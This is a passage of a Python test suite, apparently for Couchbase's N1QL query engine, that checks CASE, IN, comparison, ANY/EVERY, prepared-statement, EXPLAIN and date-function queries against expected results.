"period": ((('autumn', 'summer')[doc['join_mo'] in [6, 7, 8]],
'spring')[doc['join_mo'] in [3, 4, 5]], 'winter')
[doc['join_mo'] in [12, 1, 2]]}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['name'],
doc['period']))
self._verify_results(actual_result, expected_result)
def test_case_expr(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
query_bucket = self.get_collection_name(query_bucket)
self.query = "SELECT name, CASE job_title WHEN 'Sales' THEN 'Marketing'" + \
"ELSE job_title END AS dept FROM %s" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['name'],
doc['dept']))
expected_result = [{"name": doc['name'],
"dept": (doc['job_title'], 'Marketing')[doc['job_title'] == 'Sales']}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['name'],
doc['dept']))
self._verify_results(actual_result, expected_result)
def test_case_arithm(self):
self.query = "SELECT CASE WHEN 1+1=3 THEN 7+7 WHEN 2+2=5 THEN 8+8 ELSE 2 END"
actual_result = self.run_cbq_query()
expected_result = [{"$1": 2}]
self._verify_results(actual_result['results'], expected_result)
def test_in_int(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name from %s where join_mo in [1,6]" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (doc['name']))
expected_result = [{"name": doc['name']}
for doc in self.full_list
if doc['join_mo'] in [1, 6]]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result, expected_result)
self.query = "select name from %s where join_mo not in [1,6]" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['name']))
expected_result = [{"name": doc['name']}
for doc in self.full_list
if not (doc['join_mo'] in [1, 6])]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result, expected_result)
def test_in_str(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name from %s where job_title in ['Sales', 'Support']" % query_bucket
actual_result = self.run_cbq_query()
self.query = "select name from %s where REVERSE(job_title) in ['selaS', 'troppuS']" % query_bucket
actual_result1 = self.run_cbq_query()
self.assertEqual(actual_result['results'], actual_result1['results'])
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['name']))
expected_result = [{"name": doc['name']}
for doc in self.full_list
if doc['job_title'] in ['Sales', 'Support']]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result, expected_result)
self.query = "select name from %s where job_title not in ['Sales', 'Support']" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['name']))
expected_result = [{"name": doc['name']}
for doc in self.full_list
if not (doc['job_title'] in ['Sales', 'Support'])]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result, expected_result)
def test_prepared_in_str(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name from %s where job_title in ['Sales', 'Support']" % query_bucket
self.prepared_common_body()
def test_logic_expr(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT tasks_points.task1 as task FROM %s WHERE " % query_bucket + \
"tasks_points.task1 > 1 AND tasks_points.task1 < 4"
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['task']))
expected_result = [{"task": doc['tasks_points']['task1']}
for doc in self.full_list
if 1 < doc['tasks_points']['task1'] < 4]
expected_result = sorted(expected_result, key=lambda doc: (doc['task']))
self._verify_results(actual_result, expected_result)
def test_comparition_equal_int(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT tasks_points.task1 as task FROM %s WHERE " % query_bucket + "tasks_points.task1 = 4"
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['task']))
expected_result = [{"task": doc['tasks_points']['task1']}
for doc in self.full_list
if doc['tasks_points']['task1'] == 4]
expected_result = sorted(expected_result, key=lambda doc: (doc['task']))
self._verify_results(actual_result, expected_result)
self.query = "SELECT tasks_points.task1 as task FROM %s WHERE " % query_bucket + "tasks_points.task1 == 4"
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['task']))
self._verify_results(actual_result, expected_result)
def test_comparition_equal_str(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name FROM %s WHERE " % query_bucket + "name = 'employee-4'"
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['name']))
expected_result = [{"name": doc['name']}
for doc in self.full_list
if doc['name'] == 'employee-4']
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result, expected_result)
self.query = "SELECT name FROM %s WHERE " % query_bucket + "name == 'employee-4'"
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['name']))
self._verify_results(actual_result, expected_result)
def test_comparition_not_equal(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT tasks_points.task1 as task FROM %s WHERE " % query_bucket + \
"tasks_points.task1 != 1 ORDER BY task"
actual_result = self.run_cbq_query()
actual_result = actual_result['results']
expected_result = [{"task": doc['tasks_points']['task1']}
for doc in self.full_list
if doc['tasks_points']['task1'] != 1]
expected_result = sorted(expected_result, key=lambda doc: (doc['task']))
self._verify_results(actual_result, expected_result)
def test_comparition_not_equal_more_less(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT tasks_points.task1 as task FROM %s WHERE " % query_bucket + \
"tasks_points.task1 <> 1 ORDER BY task"
actual_result = self.run_cbq_query()
actual_result = actual_result['results']
expected_result = [{"task": doc['tasks_points']['task1']}
for doc in self.full_list
if doc['tasks_points']['task1'] != 1]
expected_result = sorted(expected_result, key=lambda doc: (doc['task']))
self._verify_results(actual_result, expected_result)
def test_every_comparision_not_equal(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name FROM %s d WHERE " % query_bucket + \
"(EVERY vm IN d.VMs SATISFIES vm.memory != 5 END) ORDER BY name"
if self.analytics:
self.query = "SELECT name FROM %s d WHERE " % query_bucket + \
"(EVERY vm IN d.VMs SATISFIES vm.memory != 5 ) ORDER BY name"
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name']}
for doc in self.full_list
if len([vm for vm in doc["VMs"]
if vm['memory'] != 5]) == len(doc["VMs"])]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_every_comparision_not_equal_less_more(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name FROM %s d WHERE " % query_bucket + \
"(EVERY vm IN d.VMs SATISFIES vm.memory <> 5 END) ORDER BY name"
if self.analytics:
self.query = "SELECT name FROM %s d WHERE " % query_bucket + \
"(EVERY vm IN d.VMs SATISFIES vm.memory <> 5 ) ORDER BY name"
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name']}
for doc in self.full_list
if len([vm for vm in doc["VMs"]
if vm['memory'] != 5]) == len(doc["VMs"])]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_any_between(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name, email FROM %s d WHERE " % query_bucket + \
"(ANY skill IN d.skills SATISFIES skill = 'skill2010' END)" + \
" AND (ANY vm IN d.VMs SATISFIES vm.RAM between 1 and 5 END)" + \
"AND NOT (job_title = 'Sales') ORDER BY name"
if self.analytics:
self.query = "SELECT name, email FROM %s d WHERE " % query_bucket + \
"(ANY skill IN d.skills SATISFIES skill = 'skill2010' )" + \
" AND (ANY vm IN d.VMs SATISFIES vm.RAM between 1 and 5 )" + \
"AND NOT (job_title = 'Sales') ORDER BY name"
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name'], "email": doc["email"]}
for doc in self.full_list
if len([skill for skill in doc["skills"]
if skill == 'skill2010']) > 0 and
len([vm for vm in doc["VMs"]
if vm["RAM"] in [1, 2, 3, 4, 5]]) > 0 and
doc["job_title"] != 'Sales']
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_any_less_equal(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name, email FROM %s d WHERE " % query_bucket + \
"(ANY skill IN d.skills SATISFIES skill = 'skill2010' END)" + \
" AND (ANY vm IN d.VMs SATISFIES vm.RAM <= 5 END)" + \
"AND NOT (job_title = 'Sales') ORDER BY name"
if self.analytics:
self.query = "SELECT name, email FROM %s d WHERE " % query_bucket + \
"(ANY skill IN d.skills SATISFIES skill = 'skill2010' )" + \
" AND (ANY vm IN d.VMs SATISFIES vm.RAM <= 5 )" + \
"AND NOT (job_title = 'Sales') ORDER BY name"
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name'], "email": doc["email"]}
for doc in self.full_list
if len([skill for skill in doc["skills"]
if skill == 'skill2010']) > 0 and
len([vm for vm in doc["VMs"]
if vm["RAM"] <= 5]) > 0 and
doc["job_title"] != 'Sales']
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_any_more_equal(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name, email FROM %s d WHERE " % query_bucket + \
"(ANY skill IN d.skills SATISFIES skill = 'skill2010' END)" + \
" AND (ANY vm IN d.VMs SATISFIES vm.RAM >= 5 END)" + \
"AND NOT (job_title = 'Sales') ORDER BY name"
if self.analytics:
self.query = "SELECT name, email FROM %s d WHERE " % query_bucket + \
"(ANY skill IN d.skills SATISFIES skill = 'skill2010' )" + \
" AND (ANY vm IN d.VMs SATISFIES vm.RAM >= 5 )" + \
"AND NOT (job_title = 'Sales') ORDER BY name"
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name'], "email": doc["email"]}
for doc in self.full_list
if len([skill for skill in doc["skills"]
if skill == 'skill2010']) > 0 and
len([vm for vm in doc["VMs"]
if vm["RAM"] >= 5]) > 0 and
doc["job_title"] != 'Sales']
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_prepared_between(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
query_bucket = self.get_collection_name(query_bucket)
self.query = "SELECT name, email FROM %s d WHERE " % query_bucket + \
"(ANY skill IN d.skills SATISFIES skill = 'skill2010' END)" + \
" AND (ANY vm IN d.VMs SATISFIES vm.RAM between 1 and 5 END)" + \
"AND NOT (job_title = 'Sales') ORDER BY name"
self.prepared_common_body()
def test_named_prepared_between(self):
self.fail_if_no_buckets()
if self.monitoring:
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertTrue(result['metrics']['resultCount'] == 0)
for query_bucket in self.query_buckets:
self.query = "SELECT name, email FROM %s d WHERE " % query_bucket + \
"(ANY skill IN d.skills SATISFIES skill = 'skill2010' END)" + \
" AND (ANY vm IN d.VMs SATISFIES vm.RAM between 1 and 5 END)" + \
"AND NOT (job_title = 'Sales') ORDER BY name"
self.prepared_common_body()
if self.monitoring:
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertTrue(result['metrics']['resultCount'] == 1)
name = result['results'][0]['prepareds']['name']
self.query = 'delete from system:prepareds where name = "%s" ' % name
self.run_cbq_query()
self.query = 'select * from system:prepareds where name = "%s" ' % name
result = self.run_cbq_query()
self.assertTrue(result['metrics']['resultCount'] == 0)
def test_prepared_comparision_not_equal_less_more(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name FROM %s d WHERE " % query_bucket + \
"(EVERY vm IN d.VMs SATISFIES vm.memory <> 5 END) ORDER BY name"
self.prepared_common_body()
def test_prepared_comparision_not_equal(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name FROM %s d WHERE " % query_bucket + \
"(EVERY vm IN d.VMs SATISFIES vm.memory != 5 END) ORDER BY name"
self.prepared_common_body()
def test_prepared_more_equal(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name FROM %s d WHERE " % query_bucket + \
"(EVERY vm IN d.VMs SATISFIES vm.memory >= 5 END) ORDER BY name"
self.prepared_common_body()
def test_prepared_less_equal(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name FROM %s d WHERE " % query_bucket + \
"(EVERY vm IN d.VMs SATISFIES vm.memory <= 5 END) ORDER BY name"
self.prepared_common_body()
def test_let_not_equal(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select compare from %s let compare = (test_rate != 2)" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"compare": doc["test_rate"] != 2}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_let_between(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select compare from %s let compare = (test_rate between 1 and 3)" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"compare": 1 <= doc["test_rate"] <= 3} for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_let_not_equal_less_more(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select compare from %s let compare = (test_rate <> 2)" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"compare": doc["test_rate"] != 2}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_let_more_equal(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select compare from %s let compare = (test_rate >= 2)" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"compare": doc["test_rate"] >= 2}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_let_less_equal(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select compare from %s let compare = (test_rate <= 2)" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"compare": doc["test_rate"] <= 2}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_comparition_equal_not_equal(self):
self.fail_if_no_buckets()
template = "SELECT join_day, join_mo FROM %s WHERE " + \
"join_day == 1 and join_mo != 2 ORDER BY join_day, join_mo"
for query_bucket in self.query_buckets:
self.query = template % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (doc['join_day'], doc['join_mo']))
expected_result = [{"join_mo": doc['join_mo'], "join_day": doc['join_day']}
for doc in self.full_list
if doc['join_day'] == 1 and doc["join_mo"] != 2]
expected_result = sorted(expected_result, key=lambda doc: (doc['join_day'], doc['join_mo']))
self._verify_results(actual_result, expected_result)
return template
def test_comparition_more_and_less_equal(self):
self.fail_if_no_buckets()
template = "SELECT join_yr, test_rate FROM %s WHERE join_yr >= 2010 AND test_rate <= 4"
for query_bucket in self.query_buckets:
self.query = template % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['test_rate'], doc['join_yr']))
expected_result = [{"test_rate": doc['test_rate'], "join_yr": doc['join_yr']}
for doc in self.full_list
if doc['test_rate'] <= 4 and
doc['join_yr'] >= 2010]
expected_result = sorted(expected_result, key=lambda doc: (doc['test_rate'], doc['join_yr']))
self._verify_results(actual_result, expected_result)
return template
def test_comparition_null_missing(self):
self.fail_if_no_buckets()
template = "SELECT skills, VMs FROM %s WHERE " + \
"skills is not null AND VMs is not missing"
for query_bucket in self.query_buckets:
self.query = template % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['VMs'], doc['skills']))
expected_result = [{"VMs": doc['VMs'], "skills": doc['skills']}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['VMs'], doc['skills']))
self._verify_results(actual_result, expected_result)
return template
def test_comparition_aggr_fns(self):
self.fail_if_no_buckets()
template = "SELECT count(join_yr) years, sum(test_rate) rate FROM %s"
for query_bucket in self.query_buckets:
self.query = template % query_bucket
actual_result = self.run_cbq_query()
actual_result = actual_result['results']
expected_result = [{"years": len([doc['join_yr'] for doc in self.full_list]),
"rate": sum([doc['test_rate'] for doc in self.full_list])}]
self.assertTrue(round(actual_result[0]['rate']) == round(expected_result[0]['rate']))
self.assertTrue((actual_result[0]['years']) == (expected_result[0]['years']))
return template
# This test has no uses anywhere
def test_comparition_meta(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT meta(d).id, meta(d).type FROM %s d" % query_bucket
actual_result = self.run_cbq_query()
actual_result = actual_result['results']
def test_comparition_more_less_equal(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT tasks_points.task1 as task FROM %s WHERE " % query_bucket + \
"tasks_points.task1 >= 1 AND tasks_points.task1 <= 4"
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['task']))
expected_result = [{"task": doc['tasks_points']['task1']} for doc in self.full_list
if 1 <= doc['tasks_points']['task1'] <= 4]
expected_result = sorted(expected_result, key=lambda doc: (doc['task']))
self._verify_results(actual_result, expected_result)
def test_comparition_expr(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT tasks_points.task1 as task FROM %s WHERE " % query_bucket + \
"tasks_points.task1 > tasks_points.task1"
actual_result = self.run_cbq_query()
self._verify_results(actual_result['results'], [])
def test_arithm(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, SUM(test_rate) % COUNT(distinct join_yr)" + \
" as avg_per_year from {0} group by job_title".format(query_bucket)
if self.analytics:
self.query = "SELECT d.job_title, SUM(d.test_rate) % COUNT(d.join_yr)" + \
" as avg_per_year from {0} d group by d.job_title".format(query_bucket)
actual_result = self.run_cbq_query()
actual_result = [{"job_title": doc["job_title"],
"avg_per_year": round(doc["avg_per_year"], 2)}
for doc in actual_result['results']]
actual_result = sorted(actual_result, key=lambda doc: (doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"avg_per_year": math.fsum([doc['test_rate']
for doc in self.full_list
if doc['job_title'] == group]) %
len({doc['join_yr'] for doc in self.full_list
if doc['job_title'] == group})}
for group in tmp_groups]
expected_result = [{"job_title": doc["job_title"],
"avg_per_year": round(doc["avg_per_year"], 2)}
for doc in expected_result]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
self.query = "SELECT job_title, (SUM(tasks_points.task1) +" + \
" SUM(tasks_points.task2)) % COUNT(distinct join_yr) as avg_per_year" + \
" from {0} group by job_title".format(query_bucket)
if self.analytics:
self.query = "SELECT d.job_title, (SUM(d.tasks_points.task1) +" + \
" SUM(d.tasks_points.task2)) % COUNT(d.join_yr) as avg_per_year" + \
" from {0} d group by d.job_title".format(query_bucket)
actual_result = self.run_cbq_query()
actual_result = [{"job_title": doc["job_title"],
"avg_per_year": round(doc["avg_per_year"], 2)}
for doc in actual_result['results']]
actual_result = sorted(actual_result, key=lambda doc: (
doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"avg_per_year": (math.fsum([doc['tasks_points']['task1']
for doc in self.full_list
if doc['job_title'] == group]) +
math.fsum([doc['tasks_points']['task2']
for doc in self.full_list
if doc['job_title'] == group])) %
len({doc['join_yr'] for doc in self.full_list
if doc['job_title'] == group})}
for group in tmp_groups]
expected_result = [{"job_title": doc["job_title"],
"avg_per_year": int(round(doc["avg_per_year"], 2))}
for doc in expected_result]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
# https://issues.couchbase.com/browse/MB-29401
def test_sum_large_negative_numbers(self):
self.fail_if_no_buckets()
self.run_cbq_query(
"insert into " + self.query_buckets[0] + " (KEY, VALUE) VALUES ('doc1',{ 'f1' : -822337203685477580 })")
self.run_cbq_query(
"insert into " + self.query_buckets[0] + " (KEY, VALUE) VALUES ('doc2',{ 'f1' : -822337203685477580 })")
self.query = "select SUM(f1) from " + self.query_buckets[0] + " "
result = self.run_cbq_query()
found_result = result['results'][0]['$1']
expected_result = -1644674407370955160
self.assertEqual(found_result, expected_result)
self.run_cbq_query(
"insert into " + self.query_buckets[0] + " (KEY, VALUE) VALUES ('doc3',{ 'f2' : -822337203685477580 })")
self.run_cbq_query("insert into " + self.query_buckets[0] + " (KEY, VALUE) VALUES ('doc4',{ 'f2' : 10 })")
self.query = "select SUM(f2) from " + self.query_buckets[0] + " "
result = self.run_cbq_query()
found_result = result['results'][0]['$1']
expected_result = -822337203685477570
self.assertEqual(found_result, expected_result)
##############################################################################################
#
# EXPLAIN
##############################################################################################
def test_explain(self):
self.fail_if_no_buckets()
for _ in self.query_buckets:
res = self.run_cbq_query()
self.log.info(res)
plan = self.ExplainPlanHelper(res)
self.assertTrue(plan["~children"][0]["index"] == "#primary",
"Type should be #primary, but is: %s" % plan["~children"][0]["index"])
##############################################################################################
#
# EXPLAIN WITH A PARTICULAR INDEX
##############################################################################################
# Test has no usages anywhere
def test_explain_particular_index(self, index):
self.fail_if_no_buckets()
for _ in self.query_buckets:
res = self.run_cbq_query()
self.log.info(res)
plan = self.ExplainPlanHelper(res)
self.assertTrue(plan['~children'][2]['~child']['~children'][0]['scan']['index'] == index,
"wrong index used")
###############################################################################################
#
# EXPLAIN WITH UNION SCAN: Covering Indexes
##############################################################################################
# Test has no usages anywhere
def test_explain_union(self, index):
self.fail_if_no_buckets()
for _ in self.query_buckets:
res = self.run_cbq_query()
plan = self.ExplainPlanHelper(res)
if "IN" in self.query:
self.assertTrue(plan["~children"][0]["~children"][0]["#operator"] == "DistinctScan",
"DistinctScan Operator is not used by this query")
else:
self.assertTrue(plan["~children"][0]["~children"][0]["#operator"] == "UnionScan",
"UnionScan Operator is not used by this query")
if plan["~children"][0]["~children"][0]["scan"]["#operator"] == "IndexScan":
self.log.info("IndexScan Operator is also used by this query in scans")
else:
self.log.error("IndexScan Operator is not used by this query, Covering Indexes not used properly")
self.fail("IndexScan Operator is not used by this query, Covering Indexes not used properly")
if plan["~children"][0]["~children"][0]["scan"]["index"] == index:
self.log.info("Query is using specified index")
else:
self.log.info("Query is not using specified index")
##############################################################################################
#
# DATETIME
##############################################################################################
def test_clock_millis(self):
self.query = "select clock_millis() as now"
res = self.run_cbq_query()
self.assertFalse("error" in str(res).lower())
def test_clock_str(self):
self.query = "select clock_str() as now"
now = datetime.datetime.now()
res = self.run_cbq_query()
expected = "%s-%02d-%02dT" % (now.year, now.month, now.day)
self.assertTrue(res["results"][0]["now"].startswith(expected),
"Result expected: %s. Actual %s" % (expected, res["results"]))
def test_date_add_millis(self):
self.query = "select date_add_millis(clock_millis(), 100, 'day') as now"
now = time.time()
res = self.run_cbq_query()
self.assertTrue((res["results"][0]["now"] > now * 1000 + 100 * 24 * 60 * 60),
"Result expected to be in: [%s ... %s]. Actual %s" % (
now * 1000 + 100 * 24 * 60 * 60, (now + 10) * 1000 + 100 * 24 * 60 * 60, res["results"]))
def test_date_add_str(self):
self.query = "select date_add_str(clock_utc(), 10, 'day') as now"
now = datetime.datetime.utcnow() + datetime.timedelta(days=10)
res = self.run_cbq_query()
expected = "%s-%02d-%02dT%02d:" % (now.year, now.month, now.day, now.hour)
expected_delta = "%s-%02d-%02dT%02d:" % (now.year, now.month, now.day, now.hour + 1)
self.assertTrue(
res["results"][0]["now"].startswith(expected) or res["results"][0]["now"].startswith(expected_delta),
"Result expected: %s. Actual %s" % (expected, res["results"]))
def test_date_diff_millis(self):
self.query = "select date_diff_millis(clock_millis(), date_add_millis(clock_millis(), 100, 'day'), 'day') as " \
"now "
res = self.run_cbq_query()
self.assertTrue(res["results"][0]["now"] == -100,
"Result expected: %s. Actual %s" % (-100, res["results"]))
def test_date_diff_str(self):
self.query = 'select date_diff_str("2014-08-24T01:33:59", "2014-08-24T07:33:59", "minute") as now'
res = self.run_cbq_query()
self.assertTrue(res["results"][0]["now"] == -360,
"Result expected: %s. Actual %s" % (-360, res["results"]))
self.query = 'select date_diff_str("2014-08-24T01:33:59", "2014-08-24T07:33:59", "hour") as now'
res = self.run_cbq_query()
self.assertTrue(res["results"][0]["now"] == -6,
"Result expected: %s. Actual %s" % (-6, res["results"]))
def test_now(self):
self.query = "select now_str() as now"
now = datetime.datetime.now()
today = date.today()
res = self.run_cbq_query()
expected = "%s-%02d-%02dT" % (today.year, today.month, today.day,)
self.assertFalse("error" in str(res).lower())
def test_hours(self):
self.query = 'select date_part_str(now_utc(), "hour") as hour, ' + \
'date_part_str(now_utc(),"minute") as minute, date_part_str(' + \
'now_utc(),"second") as sec, date_part_str(now_utc(),"millisecond") as msec'
now = datetime.datetime.utcnow()
res = self.run_cbq_query()
self.assertTrue(res["results"][0]["hour"] == now.hour or res["results"][0]["hour"] == (now.hour + 1),
"Result for hours expected: %s. Actual %s" % (now.hour, res["results"]))
self.assertTrue("minute" in res["results"][0], "No minute field")
self.assertTrue("sec" in res["results"][0], "No second field")
self.assertTrue("msec" in res["results"][0], "No msec field")
def test_where(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'select name, join_yr, join_mo, join_day from %s' % query_bucket + \
' where date_part_str(now_str(),"month") < join_mo AND date_part_str(now_str(),"year")' + \
' > join_yr AND date_part_str(now_str(),"day") < join_day'
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result["results"], key=lambda doc: (doc['name'],
doc['join_yr'],
doc['join_mo'],
doc['join_day']))
today = date.today()
expected_result = [{"name": doc['name'], "join_yr": doc['join_yr'],
"join_mo": doc['join_mo'], "join_day": doc['join_day']}
for doc in self.full_list
if doc['join_yr'] < today.year and
doc['join_mo'] > today.month and
doc['join_day'] > today.day]
expected_result = sorted(expected_result, key=lambda doc: (doc['name'],
doc['join_yr'],
doc['join_mo'],
doc['join_day']))
self._verify_results(actual_result, expected_result)
def test_prepared_date_where(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'select name, join_yr, join_mo, join_day from %s' % query_bucket + \
' where date_part_str(now_str(),"month") < join_mo AND date_part_str(now_str(),"year")' + \
' > join_yr AND date_part_str(now_str(),"day") < join_day'
self.prepared_common_body()
def test_now_millis(self):
self.query = "select now_millis() as now"
now = time.time()
res = self.run_cbq_query()
self.assertFalse("error" in str(res).lower())
def test_str_to_millis(self):
now_millis = time.time()
now_time = datetime.datetime.fromtimestamp(now_millis)
now_millis = now_millis * 1000
try:
now_time_zone = round(
(round((datetime.datetime.now() - datetime.datetime.utcnow()).total_seconds()) // 1800) // 2)
except AttributeError as ex:
raise Exception("Test requires python 2.7 : SKIPPING TEST")
now_time_str = "%s-%02d-%02d" % (now_time.year, now_time.month, now_time.day)
self.query = "select str_to_millis('%s') as now" % now_time_str
res = self.run_cbq_query()
self.assertTrue(res["results"][0]["now"] < now_millis and
(res["results"][0]["now"] > (now_millis - 5184000000)),
"Result expected to be in: [%s ... %s]. Actual %s" % (
now_millis - 5184000000, now_millis, res["results"]))
def test_millis_to_str(self):
now_millis = time.time()
now_time = datetime.datetime.utcfromtimestamp(now_millis)
expected = "%s-%02d-%02dT%02d:%02d" % (now_time.year, now_time.month, now_time.day,
now_time.hour, now_time.minute)
self.query = "select millis_to_utc(%s) as now" % (now_millis * 1000)
res = self.run_cbq_query()
self.assertTrue(res["results"][0]["now"].startswith(expected),
"Result expected: %s. Actual %s" % (expected, res["results"]))
def test_date_part_millis(self):
now_millis = time.time()
now_time = datetime.datetime.utcfromtimestamp(now_millis)
now_millis = now_millis * 1000
self.query = 'select date_part_millis(%s, "hour", "UTC") as hour, ' % now_millis + \
'date_part_millis(%s,"minute", "UTC") as minute, date_part_millis(' % now_millis + \
'%s,"second") as sec, date_part_millis(%s,"millisecond", "UTC") as msec' % (now_millis, now_millis)
res = self.run_cbq_query()
self.assertTrue(res["results"][0]["hour"] == now_time.hour,
"Result expected: %s. Actual %s" % (now_time.hour, res["results"]))
self.assertTrue(res["results"][0]["minute"] == now_time.minute,
"Result expected: %s. Actual %s" % (now_time.minute, res["results"]))
self.assertTrue(res["results"][0]["sec"] == now_time.second,
"Result expected: %s. Actual %s" % (now_time.second, res["results"]))
self.assertTrue("msec" in res["results"][0], "There are no msec in results")
def test_where_millis(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select join_yr, join_mo, join_day, name from %s" % query_bucket + \
" where join_mo < 10 and join_day < 10 and str_to_millis(tostr(join_yr) || '-0'" + \
" || tostr(join_mo) || '-0' || tostr(join_day)) < now_millis()"
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result["results"], key=lambda doc: (doc['name'],
doc['join_yr'],
doc['join_mo'],
doc['join_day']))
expected_result = [{"name": doc['name'], "join_yr": doc['join_yr'],
"join_mo": doc['join_mo'], "join_day": doc['join_day']}
for doc in self.full_list
if doc['join_mo'] < 10 and doc['join_day'] < 10]
expected_result = sorted(expected_result, key=lambda doc: (doc['name'],
doc['join_yr'],
doc['join_mo'],
doc['join_day']))
self._verify_results(actual_result, expected_result)
def test_order_by_dates(self):
self.fail_if_no_buckets()
orders = ["asc", "desc"]
for order in orders:
for query_bucket in self.query_buckets:
self.query = "select millis_to_str(str_to_millis('2010-01-01')) as date"
actual_result = self.run_cbq_query()
self.assertTrue(actual_result["results"][0]["date"][:10] == '2010-01-01',
'Actual result %s' % actual_result)
self.query = "select join_yr, join_mo, join_day," \
